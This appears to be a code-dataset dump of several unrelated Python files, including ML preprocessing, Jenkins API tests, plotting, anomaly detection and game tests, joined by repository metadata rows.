] | null | null | null | Part 1 - Data Preprocessing/data_preprocessing.py | Tatvam/Machine-Learning | a18d3f541d99a8fb0cfbe89df358a11d3121b4f5 | [
"MIT"
] | null | null | null | Part 1 - Data Preprocessing/data_preprocessing.py | Tatvam/Machine-Learning | a18d3f541d99a8fb0cfbe89df358a11d3121b4f5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 8 15:15:29 2018
@author: tatvam
importing the libraries
"""
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# import the dataset
dataset = pd.read_csv("Data.csv")
# Features X: every column except the last; target Y: the fourth column
# (index 3), i.e. the last column of a four-column CSV.
X = dataset.iloc[:, :-1].values
Y = dataset.iloc[:, 3].values
# Splitting the data into training set and test set
# (80/20 split; fixed random_state makes the split reproducible).
from sklearn.model_selection import train_test_split
X_train,X_test,Y_train,Y_test = train_test_split(X,Y, test_size = 0.2, random_state = 0)
"""# feature scaling
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)""" | 22.933333 | 88 | 0.741279 |
fed3cd8321c318f2dc707c9994a2ee0cad04c478 | 785 | py | Python | qiniu_ufop/management/commands/createproject.py | Xavier-Lam/qiniu-ufop | 02c6119c69637cb39e2b73a915e68b77afa07fe3 | [
"MIT"
] | 5 | 2019-06-10T12:53:41.000Z | 2020-12-06T02:57:37.000Z | qiniu_ufop/management/commands/createproject.py | Xavier-Lam/qiniu-ufop | 02c6119c69637cb39e2b73a915e68b77afa07fe3 | [
"MIT"
] | null | null | null | qiniu_ufop/management/commands/createproject.py | Xavier-Lam/qiniu-ufop | 02c6119c69637cb39e2b73a915e68b77afa07fe3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from distutils.dir_util import copy_tree
from kombu.utils.objects import cached_property
import qiniu_ufop
from ..base import BaseCommand
| 28.035714 | 75 | 0.657325 |
fed4560e0eada1a8875a46b508b9927cb620d08a | 8,991 | py | Python | jenkinsapi_tests/unittests/test_nodes.py | kkpattern/jenkinsapi | 6b0091c5f44e4473c0a3d5addbfdc416bc6515ca | [
"MIT"
] | 556 | 2016-07-27T03:42:48.000Z | 2022-03-31T15:05:19.000Z | jenkinsapi_tests/unittests/test_nodes.py | kkpattern/jenkinsapi | 6b0091c5f44e4473c0a3d5addbfdc416bc6515ca | [
"MIT"
] | 366 | 2016-07-24T02:51:45.000Z | 2022-03-24T17:02:45.000Z | jenkinsapi_tests/unittests/test_nodes.py | kkpattern/jenkinsapi | 6b0091c5f44e4473c0a3d5addbfdc416bc6515ca | [
"MIT"
] | 308 | 2016-08-01T03:35:45.000Z | 2022-03-31T01:06:57.000Z | import pytest
from jenkinsapi.jenkins import Jenkins
from jenkinsapi.nodes import Nodes
from jenkinsapi.node import Node
# Fixture: canned top-level Jenkins API payload (master node description plus
# its two views); presumably captured from a live instance at http://halob:8080/
# — the embedded URLs point there.
DATA0 = {
    'assignedLabels': [{}],
    'description': None,
    'jobs': [],
    'mode': 'NORMAL',
    'nodeDescription': 'the master Jenkins node',
    'nodeName': '',
    'numExecutors': 2,
    'overallLoad': {},
    'primaryView': {'name': 'All', 'url': 'http://halob:8080/'},
    'quietingDown': False,
    'slaveAgentPort': 0,
    'unlabeledLoad': {},
    'useCrumbs': False,
    'useSecurity': False,
    'views': [
        {'name': 'All', 'url': 'http://halob:8080/'},
        {'name': 'FodFanFo', 'url': 'http://halob:8080/view/FodFanFo/'}
    ]
}
DATA1 = {
'busyExecutors': 0,
'computer': [
{
'actions': [],
'displayName': 'master',
'executors': [{}, {}],
'icon': 'computer.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 0},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/var/lib/jenkins',
'size': 671924924416
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 0},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 3174686720,
'availableSwapSpace': 17163087872,
'totalPhysicalMemory': 16810180608,
'totalSwapSpace': 17163087872
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 671924924416
}
},
'numExecutors': 2,
'offline': False,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
},
{
'actions': [],
'displayName': 'bobnit',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 4261},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/home/sal/jenkins',
'size': 169784860672
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 29},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 4570710016,
'availableSwapSpace': 12195983360,
'totalPhysicalMemory': 8374497280,
'totalSwapSpace': 12195983360
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 249737277440
}
},
'numExecutors': 1,
'offline': True,
'offlineCause': {},
'oneOffExecutors': [],
'temporarilyOffline': False
},
{
'actions': [],
'displayName': 'halob',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': True,
'launchSupported': False,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': None,
'hudson.node_monitors.ClockMonitor': None,
'hudson.node_monitors.DiskSpaceMonitor': None,
'hudson.node_monitors.ResponseTimeMonitor': None,
'hudson.node_monitors.SwapSpaceMonitor': None,
'hudson.node_monitors.TemporarySpaceMonitor': None
},
'numExecutors': 1,
'offline': True,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
],
'displayName': 'nodes',
'totalExecutors': 2
}
DATA2 = {
'actions': [],
'displayName': 'master',
'executors': [{}, {}],
'icon': 'computer.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 0},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/var/lib/jenkins',
'size': 671942561792
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 0},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 2989916160,
'availableSwapSpace': 17163087872,
'totalPhysicalMemory': 16810180608,
'totalSwapSpace': 17163087872
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 671942561792
}
},
'numExecutors': 2,
'offline': False,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
DATA3 = {
'actions': [],
'displayName': 'halob',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': True,
'launchSupported': False,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': None,
'hudson.node_monitors.ClockMonitor': None,
'hudson.node_monitors.DiskSpaceMonitor': None,
'hudson.node_monitors.ResponseTimeMonitor': None,
'hudson.node_monitors.SwapSpaceMonitor': None,
'hudson.node_monitors.TemporarySpaceMonitor': None},
'numExecutors': 1,
'offline': True,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
def fake_node_poll(self, tree=None):  # pylint: disable=unused-argument
    """Fake poll used by the tests: return this node's section of DATA1.

    Scans DATA1['computer'] for the entry whose displayName equals
    self.name; when no entry matches, the DATA2 payload is returned.
    """
    matches = (entry for entry in DATA1['computer']
               if entry['displayName'] == self.name)
    return next(matches, DATA2)
| 30.686007 | 82 | 0.571015 |
fed6388f5baf349f9563436e423b3f0bfd27a9e9 | 790 | py | Python | message_gen/legacy/messages/ClientGetCloudHostResponse.py | zadjii/nebula | 50c4ec019c9f7eb15fe105a6c53a8a12880e281c | [
"MIT"
] | 2 | 2020-04-15T11:20:59.000Z | 2021-05-12T13:01:36.000Z | message_gen/legacy/messages/ClientGetCloudHostResponse.py | zadjii/nebula | 50c4ec019c9f7eb15fe105a6c53a8a12880e281c | [
"MIT"
] | 1 | 2018-06-05T04:48:56.000Z | 2018-06-05T04:48:56.000Z | message_gen/legacy/messages/ClientGetCloudHostResponse.py | zadjii/nebula | 50c4ec019c9f7eb15fe105a6c53a8a12880e281c | [
"MIT"
] | 1 | 2018-08-15T06:45:46.000Z | 2018-08-15T06:45:46.000Z | from messages.SessionMessage import SessionMessage
from msg_codes import CLIENT_GET_CLOUD_HOST_RESPONSE as CLIENT_GET_CLOUD_HOST_RESPONSE
__author__ = 'Mike'
| 34.347826 | 86 | 0.698734 |
fed71aa40e24235555d670228f89196c28a60884 | 8,072 | py | Python | research/route_diversity/timeline_from_csv.py | jweckstr/journey-diversity-scripts | 7b754c5f47a77ee1d630a0b26d8ec5cf6be202ae | [
"MIT"
] | null | null | null | research/route_diversity/timeline_from_csv.py | jweckstr/journey-diversity-scripts | 7b754c5f47a77ee1d630a0b26d8ec5cf6be202ae | [
"MIT"
] | null | null | null | research/route_diversity/timeline_from_csv.py | jweckstr/journey-diversity-scripts | 7b754c5f47a77ee1d630a0b26d8ec5cf6be202ae | [
"MIT"
] | null | null | null | """
PSEUDOCODE:
Load csv to pandas
csv will be of form: city, event type, event name, year, theme_A, theme_B, theme_C...
City can contain multiple cities, separated by TBD?
Check min and max year
Open figure,
Deal with events in same year, offset a little bit?
For city in cities:tle
for event in events
"""
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
from collections import OrderedDict
from numpy import cos, sin, deg2rad, arange
from matplotlib import gridspec
from pylab import Circle
base_path = "/home/clepe/route_diversity/data/plannord_tables/"
themes_path = base_path + "themes.csv"
events_path = base_path + "events.csv"
# --- Layout constants for the timeline figure (plot-coordinate units) ---
year_length = 1
city_height = 1      # vertical spacing between city rows
size = 0.1           # marker/circle radius
theme_length = 0.5   # length of the theme "spoke" drawn from each marker
theme_width = 1      # line width of the theme spokes
offset = 0.15
event_offset = 0.15  # vertical separation between event lines of different types
start_year = 2000    # plotted time window
end_year = 2024
# Plot color per document category; 'Other' is drawn in black.
color_dict = {"Land use or infrastructure planning": "#66c2a5",
              "Service level analysis or definitions": "#fc8d62",
              "PTN plan or comparison": "#8da0cb",
              "PT strategy": "#e78ac3",
              "Transport system plan or strategy": "#a6d854",
              'Other': "k"}
# Collapse fine-grained document types into the broader categories above.
type_dict = {"Conference procedings": "Other",
             'PTS whitepaper': "Other",
             'Replies from hearing': "Other",
             'PT authority strategy': "Other",
             'PTS white paper': "Other",
             'PT "product characterization"': "Other",
             'Other': "Other",
             "Infrastructure analysis or plan": "Land use or infrastructure planning",
             "Master planning": "Land use or infrastructure planning",
             "PT service level analysis": "Service level analysis or definitions",
             "PT service level definitions": "Service level analysis or definitions",
             "PTN comparison": "PTN plan or comparison",
             "PTS plan": "PTN plan or comparison",
             "PTS strategy": "PT strategy",
             "Transport system plan": "Transport system plan or strategy",
             "Transport system strategy": "Transport system plan or strategy"}
# Vertical offset per event type so simultaneous event lines don't overlap.
event_offsets = {"LRT/tram": event_offset,
                 "BHLS or large route overhaul": 0,
                 "BRT/superbus": -1 * event_offset}
# Line color per event type.
event_colors = {"LRT/tram": "g",
                "BHLS or large route overhaul": "#0042FF",
                "BRT/superbus": "#001C6E"}
# Angle (degrees, measured clockwise from vertical) of the spoke drawn for
# each research theme around a document marker.
theme_angles = {"through_routes": 0, "network_simplicity": 120, "trunk_network": 240}
themes_df = pd.read_csv(themes_path)
events_df = pd.read_csv(events_path)
themes_df = themes_df[pd.notnull(themes_df['year'])]
events_df = events_df[pd.notnull(events_df['year'])]
themes_df["year"] = themes_df.apply(lambda x: clean_years(x.year), axis=1)
events_df["year"] = events_df.apply(lambda x: clean_years(x.year), axis=1)
themes_df = split_to_separate_rows(themes_df, "city", "/")
themes_df.loc[themes_df['city'] == "Fredrikstad-Sarpsborg", 'city'] = "F:stad-S:borg"
events_df.loc[events_df['city'] == "Fredrikstad-Sarpsborg", 'city'] = "F:stad-S:borg"
themes_df.loc[themes_df['city'] == "Porsgrunn-Skien", 'city'] = "P:grunn-Skien"
events_df.loc[events_df['city'] == "Porsgrunn-Skien", 'city'] = "P:grunn-Skien"
city_year_slots = {}
for i, row in themes_df[["city", "year"]].append(events_df[["city", "year"]]).iterrows():
if (row.city, row.year) in city_year_slots.keys():
city_year_slots[(row.city, row.year)] += 1
else:
city_year_slots[(row.city, row.year)] = 1
city_year_cur_slot = {key: 0 for key, value in city_year_slots.items()}
cities = [x for x in set(themes_df.city.dropna().tolist()) if "/" not in x]
cities.sort(reverse=True)
themes_df["type"] = themes_df.apply(lambda row: type_dict[row.type], axis=1)
types = [x for x in set(themes_df.type.dropna().tolist())]
fig = plt.figure()
ax1 = plt.subplot(111)
#gs = gridspec.GridSpec(1, 2, width_ratios=[1, 9])
#ax1 = plt.subplot(gs[1])
#ax2 = plt.subplot(gs[0], sharey=ax1)
"""
gs1 = gridspec.GridSpec(3, 3)
gs1.update(right=.7, wspace=0.05)
ax1 = plt.subplot(gs1[:-1, :])
ax2 = plt.subplot(gs1[-1, :-1])
ax3 = plt.subplot(gs1[-1, -1])
"""
groups = themes_df.groupby('type')
for i, row in events_df.iterrows():
e_offset = event_offsets[row.type]
c = event_colors[row.type]
y = city_height * cities.index(row.city) + e_offset
x = row.year
ax1.plot([row.year, end_year+1], [y, y], c=c, marker='o', label=row.type, zorder=2, markersize=3)
for name, group in groups:
for i, row in group.iterrows():
n_slots = city_year_slots[(row.city, row.year)]
cur_slot = city_year_cur_slot[(row.city, row.year)]
city_year_cur_slot[(row.city, row.year)] += 1
slot_offset = slot_location(n_slots, cur_slot)
y = city_height * cities.index(row.city) + slot_offset[0]
x = row.year + slot_offset[1]
if row.year < start_year:
continue
#circle = Circle((x, y), color=color_dict[name], radius=size, label=name, zorder=5)
ax1.scatter(x, y, color=color_dict[name], s=5, label=name, zorder=5) #add_patch(circle)
for theme, angle in theme_angles.items():
if pd.notnull(row[theme]):
ax1.plot([x, x + theme_length * sin(deg2rad(angle))], [y, y + theme_length * cos(deg2rad(angle))],
c=color_dict[name], zorder=10, linewidth=theme_width)
handles, labels = ax1.get_legend_handles_labels()
by_label = OrderedDict(zip(labels, handles))
#ax1.legend(by_label.values(), by_label.keys())
# TODO: add year for GTFS feed as vertical line
#ax2 = fig.add_subplot(121, sharey=ax1)
for city in cities:
y = city_height * cities.index(city)
x = end_year
ax1.text(x, y, city, horizontalalignment='left', verticalalignment='center', fontsize=10) #, bbox=dict(boxstyle="square", facecolor='white', alpha=0.5, edgecolor='white'))
ax1.plot([start_year-1, end_year+1], [y, y], c="grey", alpha=0.5, linewidth=0.1, zorder=1)
ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
ax1.set_yticks([])
ax1.set_yticklabels([])
#ax2.axis('off')
ax1.set_xlim(start_year, end_year)
ax1.set_aspect("equal")
plt.xticks(arange(start_year, end_year, 5))
plt.savefig(base_path+'timeline.pdf', format="pdf", dpi=300, bbox_inches='tight')
fig = plt.figure()
ax2 = plt.subplot(111)
ax2.legend(by_label.values(), by_label.keys(), loc='center', #bbox_to_anchor=(0.5, -0.05),
fancybox=True, shadow=True, ncol=2)
ax2.axis('off')
plt.savefig(base_path+'legend.pdf', format="pdf", dpi=300, bbox_inches='tight')
#plt.show()
# create legend for themes in a separate figure
fig = plt.figure()
ax3 = plt.subplot(111)
x = 0
y = 0
circle = Circle((x, y), color="black", radius=size, zorder=5)
ax3.add_patch(circle)
for theme, angle in theme_angles.items():
x1 = x + theme_length * sin(deg2rad(angle))
y1 = y + theme_length * cos(deg2rad(angle))
x2 = x + theme_length * sin(deg2rad(angle)) * 1.2
y2 = y + theme_length * cos(deg2rad(angle)) * 1.2
ax3.annotate(theme.capitalize().replace("_", " "), (x1, y1), (x2, y2), horizontalalignment='center',
verticalalignment='center', color="red", zorder=10, size=15)
ax3.plot([x, x1], [y, y1], c="black",
linewidth=10*theme_width, zorder=1)
ax3.set_aspect("equal")
ax3.axis('off')
plt.savefig(base_path+'timeline_themes.pdf', format="pdf", dpi=300, bbox_inches='tight')
| 35.559471 | 175 | 0.650768 |
fed7cf7a07873e74fd5bc50796d61484b796fe97 | 2,012 | py | Python | bevm/db.py | sorawit/bevm | 850b2d64fc12dae92d9cdaf8b4c48b90cc0d05d6 | [
"MIT"
] | 1 | 2021-09-15T10:16:46.000Z | 2021-09-15T10:16:46.000Z | bevm/db.py | sorawit/bevm | 850b2d64fc12dae92d9cdaf8b4c48b90cc0d05d6 | [
"MIT"
] | null | null | null | bevm/db.py | sorawit/bevm | 850b2d64fc12dae92d9cdaf8b4c48b90cc0d05d6 | [
"MIT"
] | null | null | null | from eth.db.atomic import AtomicDB
from eth.db.backends.level import LevelDB
from eth.db.account import AccountDB
from rlp.sedes import big_endian_int
from bevm.block import Block
from bevm.action import rlp_decode_action
ACTION_COUNT = b'BEVM:ACTION_COUNT'
| 32.983607 | 77 | 0.700795 |
fed896e00f41aed0c3e19962de5fce02825adb90 | 2,408 | py | Python | api/ops/tasks/detection/core/detectionTypes/valueThreshold.py | LeiSoft/CueObserve | cc5254df7d0cb817a8b3ec427f5cb54a1d420f7e | [
"Apache-2.0"
] | 149 | 2021-07-16T13:37:30.000Z | 2022-03-21T10:13:15.000Z | api/ops/tasks/detection/core/detectionTypes/valueThreshold.py | LeiSoft/CueObserve | cc5254df7d0cb817a8b3ec427f5cb54a1d420f7e | [
"Apache-2.0"
] | 61 | 2021-07-15T06:39:05.000Z | 2021-12-27T06:58:10.000Z | api/ops/tasks/detection/core/detectionTypes/valueThreshold.py | LeiSoft/CueObserve | cc5254df7d0cb817a8b3ec427f5cb54a1d420f7e | [
"Apache-2.0"
] | 22 | 2021-07-19T07:20:49.000Z | 2022-03-21T10:13:16.000Z | import dateutil.parser as dp
from dateutil.relativedelta import relativedelta
import pandas as pd, datetime as dt
def checkLatestAnomaly(df, operationCheckStr):
    """
    Look up the most recent anomalous row in *df* and describe it.

    Args:
        df: DataFrame with "ds" (ISO timestamp string), "y" (value) and
            "anomaly" columns; assumed sorted ascending by "ds" (the caller,
            valueThresholdDetect, sorts before calling).
        operationCheckStr: human-readable description of the threshold
            check, echoed back in the result.

    Returns:
        dict with operationCheck, value, anomalyTimeISO and anomalyTime
        (epoch milliseconds) for the latest anomaly, or {} when there is none.
    """
    # 15 is the "anomalous" marker produced by valueThresholdDetect
    # (condition * 14 + 1): violating rows score 15, normal rows 1.
    anomalies = df[df["anomaly"] == 15]
    if anomalies.shape[0] > 0:
        # With df sorted by "ds", the last matching row is the latest anomaly.
        lastAnomalyRow = anomalies.iloc[-1]
        anomalyTime = lastAnomalyRow["ds"]
        return {
            "operationCheck": operationCheckStr,
            "value": float(lastAnomalyRow["y"]),
            "anomalyTimeISO": dp.parse(anomalyTime).isoformat(),
            "anomalyTime": dp.parse(anomalyTime).timestamp() * 1000,
        }
    return {}
def valueThresholdDetect(df, granularity, operator, value1, value2):
    """
    Method to perform threshold-based anomaly detection on given dataframe.
    df : pandas.DataFrame with columns "ds" (timestamp) and "y" (value)
    granularity : "day" or "hour"; controls how many trailing rows are returned
    operator : one of "greater", "lesser", "!greater", "!lesser",
        "between", "!between"
    value1, value2 : threshold bounds; value2 is the literal string "null"
        for the unary operators
    """
    value1 = int(value1)
    lowerVal = value1
    upperVal = value1
    if value2 != "null":
        value2 = int(value2)
        lowerVal = min(value1, value2)
        upperVal = max(value1, value2)
    # Human-readable description of the active check (embedded in the result).
    operationStrDict = {
        "greater": f'greater than {value1}',
        "lesser": f'lesser than {value1}',
        "!greater": f'not greater than {value1}',
        "!lesser": f'not lesser than {value1}',
        "between": f'between {lowerVal} and {upperVal}',
        "!between": f'not between {lowerVal} and {upperVal}'
    }
    # Predicates returning a boolean Series for each operator. Using plain
    # callables instead of eval()-ing stored source strings keeps this safe
    # and debuggable while producing the same boolean masks.
    operationDict = {
        "greater": lambda y: y > value1,
        "lesser": lambda y: y < value1,
        "!greater": lambda y: y <= value1,
        "!lesser": lambda y: y >= value1,
        "between": lambda y: (y >= lowerVal) & (y <= upperVal),
        "!between": lambda y: (y < lowerVal) | (y > upperVal)
    }
    today = dt.datetime.now()
    df["ds"] = pd.to_datetime(df["ds"])
    df = df.sort_values("ds")
    # Normalize timestamps to second-resolution ISO strings for comparison.
    df["ds"] = df["ds"].apply(lambda date: date.isoformat()[:19])
    todayISO = today.replace(hour=0, minute=0, second=0, microsecond=0, tzinfo=None).isoformat()[:19]
    # Rows from today (after local midnight) are excluded from scoring.
    df = df[df["ds"] < todayISO]
    # Anomalous rows score 15 (True * 14 + 1), normal rows score 1.
    df["anomaly"] = operationDict[operator](df["y"]) * 14 + 1
    anomalyLatest = checkLatestAnomaly(df, operationStrDict[operator])
    df = df[["ds", "y", "anomaly"]]
    # Keep the trailing 45 rows for daily data, 24 * 7 rows for hourly data.
    numActual = 45 if granularity == "day" else 24 * 7
    output = {
        "anomalyData": {
            "actual": df[-numActual:].to_dict("records")
        },
        "anomalyLatest": anomalyLatest
    }
    return output
fed8e9ad56ccf5ea28b13fbec8dee05b0037dc77 | 343 | py | Python | src/chapter8/exercise6.py | group7BSE1/BSE-2021 | 2553b12e5fd5d1015af4746bcf84a8ee7c1cb8e0 | [
"MIT"
] | null | null | null | src/chapter8/exercise6.py | group7BSE1/BSE-2021 | 2553b12e5fd5d1015af4746bcf84a8ee7c1cb8e0 | [
"MIT"
] | null | null | null | src/chapter8/exercise6.py | group7BSE1/BSE-2021 | 2553b12e5fd5d1015af4746bcf84a8ee7c1cb8e0 | [
"MIT"
] | 1 | 2021-04-07T14:49:04.000Z | 2021-04-07T14:49:04.000Z | list = []
# NOTE(review): the accumulator is named `list` (initialized just above this
# block), shadowing the builtin; kept because it is defined outside this span.
while True:
    input_num = input('Enter a number: ')
    if input_num == 'done':
        break
    try:
        # Store the parsed float — the original appended the raw string, so
        # max()/min() compared lexicographically ("9" > "10") and the
        # converted value was discarded.
        number = float(input_num)
    except ValueError:
        # Invalid input should not abort the whole program (the original
        # called quit()); report it and keep prompting.
        print('Invalid input')
        continue
    list.append(number)
if list:
    # `or None` removed: inside this branch the list is non-empty, and with
    # numeric values a maximum of 0.0 would have wrongly printed None.
    print('Maximum: ', max(list))
    print('Minimum: ', min(list))
fed8fa9a87db15241481aa01020912d1d1d9aa17 | 91 | py | Python | client/const.py | math2001/nine43 | 7749dc63b9717a6ee4ddc1723d6c59e16046fc01 | [
"MIT"
] | null | null | null | client/const.py | math2001/nine43 | 7749dc63b9717a6ee4ddc1723d6c59e16046fc01 | [
"MIT"
] | 3 | 2019-04-27T06:34:34.000Z | 2019-04-27T21:29:31.000Z | client/const.py | math2001/nine43 | 7749dc63b9717a6ee4ddc1723d6c59e16046fc01 | [
"MIT"
] | null | null | null | MONO = "FiraMono-Medium"
# Port for the client's network connection — TODO confirm against the server.
PORT = 9999
# URL of the project's public issue tracker.
ISSUES = "https://github.com/math2001/nine43/issues"
| 18.2 | 52 | 0.725275 |
fed91e7ac94b5be8280a7f183dba3afc80ab32c6 | 484 | py | Python | zipencrypt/__init__.py | norcuni/zipencrypt | 897f03d05f5b2881e915ed346d0498f58abf3ac8 | [
"MIT"
] | 5 | 2018-06-05T18:57:10.000Z | 2020-12-04T10:08:31.000Z | zipencrypt/__init__.py | norcuni/zipencrypt | 897f03d05f5b2881e915ed346d0498f58abf3ac8 | [
"MIT"
] | 2 | 2018-11-07T02:53:40.000Z | 2019-10-30T20:48:40.000Z | zipencrypt/__init__.py | devthat/zipencrypt | 897f03d05f5b2881e915ed346d0498f58abf3ac8 | [
"MIT"
] | null | null | null | import sys
# True when running under a Python 2 interpreter.
PY2 = sys.version_info[0] == 2
if not PY2:
    # Python 3: delegate the whole public API to the py3 implementation.
    from .zipencrypt3 import __all__ as zipencrypt3_all
    from .zipencrypt3 import *
    __all__ = zipencrypt3_all
else:
    # Python 2: take ZipFile from the py2 implementation and re-export the
    # remaining names straight from the stdlib zipfile module.
    from .zipencrypt2 import ZipFile
    from zipfile import (BadZipfile, error, ZIP_STORED, ZIP_DEFLATED,
                         is_zipfile, ZipInfo, PyZipFile, LargeZipFile)
    __all__ = ["BadZipfile", "error", "ZIP_STORED", "ZIP_DEFLATED",
               "is_zipfile", "ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile"]
| 32.266667 | 79 | 0.692149 |
fed9bd2808591485831ae3b90b08dc959af84228 | 19 | py | Python | deprecated/origin_stgcn_repo/feeder/__init__.py | fserracant/mmskeleton | 44008bdef3dd6354a17c220fac8bcd8cd08ed201 | [
"Apache-2.0"
] | 2,302 | 2018-01-23T11:18:30.000Z | 2022-03-31T12:24:55.000Z | deprecated/origin_stgcn_repo/feeder/__init__.py | fserracant/mmskeleton | 44008bdef3dd6354a17c220fac8bcd8cd08ed201 | [
"Apache-2.0"
] | 246 | 2019-08-24T15:36:11.000Z | 2022-03-23T06:57:02.000Z | deprecated/origin_stgcn_repo/feeder/__init__.py | fserracant/mmskeleton | 44008bdef3dd6354a17c220fac8bcd8cd08ed201 | [
"Apache-2.0"
] | 651 | 2018-01-24T00:56:54.000Z | 2022-03-25T23:42:53.000Z | from . import tools | 19 | 19 | 0.789474 |
feda36d66368a5ba3e059121a70717771426dc48 | 138 | py | Python | nifs/retrieve/rawdata/__init__.py | nifs-software/nifs-retrieve | 4ff9d70a1d2301d7b5762162586388ae67046ad2 | [
"MIT"
] | null | null | null | nifs/retrieve/rawdata/__init__.py | nifs-software/nifs-retrieve | 4ff9d70a1d2301d7b5762162586388ae67046ad2 | [
"MIT"
] | 2 | 2021-12-16T04:50:00.000Z | 2021-12-22T11:55:01.000Z | nifs/retrieve/rawdata/__init__.py | nifs-software/nifs-retrieve | 4ff9d70a1d2301d7b5762162586388ae67046ad2 | [
"MIT"
] | null | null | null | from .rawdata import RawData
from .timedata import TimeData
from .voltdata import VoltData
__all__ = ["RawData", "TimeData", "VoltData"]
| 23 | 45 | 0.768116 |
fedb6c7eea105f52852855900c26c30796b4a06e | 5,654 | py | Python | preprocess/sketch_generation.py | code-gen/exploration | c83d79745df9566c5f1a82e581008e0984fcc319 | [
"MIT"
] | null | null | null | preprocess/sketch_generation.py | code-gen/exploration | c83d79745df9566c5f1a82e581008e0984fcc319 | [
"MIT"
] | 1 | 2019-05-11T14:49:58.000Z | 2019-05-24T15:02:54.000Z | preprocess/sketch_generation.py | code-gen/exploration | c83d79745df9566c5f1a82e581008e0984fcc319 | [
"MIT"
] | null | null | null | """
Sketch (similar to Coarse-to-Fine)
- keep Python keywords as is
- strip off arguments and variable names
- substitute tokens with types: `NUMBER`, `STRING`
- specialize `NAME` token:
- for functions: `FUNC#<num_args>`
# Examples
x = 1 if True else 0
NAME = NUMBER if True else NUMBER
result = SomeFunc(1, 2, 'y', arg)
NAME = FUNC#4 ( NUMBER , NUMBER , STRING , NAME )
result = [x for x in DoWork(xs) if x % 2 == 0]
NAME = [ NAME for NAME in FUNC#1 ( NAME ) if NAME % NUMBER == NUMBER ]
"""
import ast
import builtins
import io
import sys
import token
from collections import defaultdict
from tokenize import TokenInfo, tokenize
import astpretty
from termcolor import colored
def main():
    """Parse the Python snippet given as the first CLI argument,
    pretty-print its AST, and print the generated sketch.
    """
    # v = ASTVisitor()
    # t = v.visit(ast.parse('x = SomeFunc(2, 3, y, "test")'))
    # print(v.functions)
    # astpretty.pprint(tree.body[0], indent=' ' * 4)
    # exec(compile(tree, filename="<ast>", mode="exec"))
    # First positional argument is the code snippet to sketch.
    code_snippet = sys.argv[1]
    # Dump the AST of the snippet's first statement for inspection.
    astpretty.pprint(ast.parse(code_snippet).body[0], indent=' ' * 4)
    # Sketch is defined elsewhere in this module (not visible in this chunk);
    # presumably it produces the abstracted token sequence described in the
    # module docstring — confirm against the full file.
    sketch = Sketch(code_snippet, verbose=True).generate()
    # print(sketch.details())
    print(sketch)
if __name__ == '__main__':
    main()
| 29.447917 | 105 | 0.579413 |
fedbf772bab9d4ac688fa0669b5207dce247b24c | 8,538 | py | Python | LPBv2/tests/game/test_player.py | TierynnB/LeaguePyBot | 2e96230b9dc24d185ddc0c6086d79f7d01e7a643 | [
"MIT"
] | 45 | 2020-11-28T04:45:45.000Z | 2022-03-31T05:53:37.000Z | LPBv2/tests/game/test_player.py | TierynnB/LeaguePyBot | 2e96230b9dc24d185ddc0c6086d79f7d01e7a643 | [
"MIT"
] | 13 | 2021-01-15T00:50:10.000Z | 2022-02-02T15:16:49.000Z | LPBv2/tests/game/test_player.py | TierynnB/LeaguePyBot | 2e96230b9dc24d185ddc0c6086d79f7d01e7a643 | [
"MIT"
] | 14 | 2020-12-21T10:03:31.000Z | 2021-11-22T04:03:03.000Z | import pytest
from LPBv2.common import (
InventoryItem,
PlayerInfo,
PlayerScore,
PlayerStats,
TeamMember,
MinimapZone,
merge_dicts,
)
from LPBv2.game import Player
update_data = {
"abilities": {
"E": {
"abilityLevel": 0,
"displayName": "\u9b42\u306e\u8a66\u7df4",
"id": "IllaoiE",
"rawDescription": "GeneratedTip_Spell_IllaoiE_Description",
"rawDisplayName": "GeneratedTip_Spell_IllaoiE_DisplayName",
},
"Passive": {
"displayName": "\u65e7\u795e\u306e\u9810\u8a00\u8005",
"id": "IllaoiPassive",
"rawDescription": "GeneratedTip_Passive_IllaoiPassive_Description",
